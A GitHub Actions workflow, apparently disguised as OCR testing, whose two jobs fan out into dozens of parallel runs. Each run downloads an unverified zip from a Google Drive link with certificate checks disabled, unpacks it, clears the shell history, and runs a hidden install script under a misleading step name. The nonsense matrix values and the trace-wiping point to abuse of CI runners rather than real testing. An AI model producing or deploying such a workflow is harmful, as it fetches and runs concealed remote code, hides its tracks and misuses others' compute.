name: phantich9core
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  check:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Prepare', 'Construct', 'Inspect', 'Activate', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1ctfzVoqgN-2Rx1rwlcbPA8eye071aJC5" -O phantich9core.zip
        unzip -o phantich9core.zip
        rm phantich9core.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  configure1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Acquire', 'Assemble', 'Verify', 'Launch', 'Deliver']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1ctfzVoqgN-2Rx1rwlcbPA8eye071aJC5" -O phantich9core.zip
        unzip -o phantich9core.zip
        rm phantich9core.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
